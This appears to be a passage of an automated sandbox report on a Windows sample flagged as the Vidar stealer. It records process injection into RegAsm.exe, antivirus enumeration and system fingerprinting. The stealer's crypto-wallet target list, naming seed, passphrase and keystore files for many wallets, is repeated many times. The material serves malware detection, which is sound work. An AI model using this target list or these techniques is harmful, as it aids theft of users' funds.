                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10A9008Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C62BC cpuid 0_2_003C62BC
                        Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_003DC00D
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_003DC098
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_003DC2EB
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_003DC414
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_003DC51A
                        Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_003DC5E9
                        Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_003D52B3
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_003D57D9
                        Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_003DBC85
                        Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_003DBF27
                        Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_003DBF72
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,5_2_00410370
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,LocalFree,5_2_004103E9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C66D2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_003C66D2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00410220 GetProcessHeap,HeapAlloc,GetUserNameA,5_2_00410220
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00410300 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,5_2_00410300
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 0.2.file.exe.3eeac0.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3eeac0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 7448, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7532, type: MEMORYSTR
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Exodus Web3 Wallet
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.json*
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: tWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia 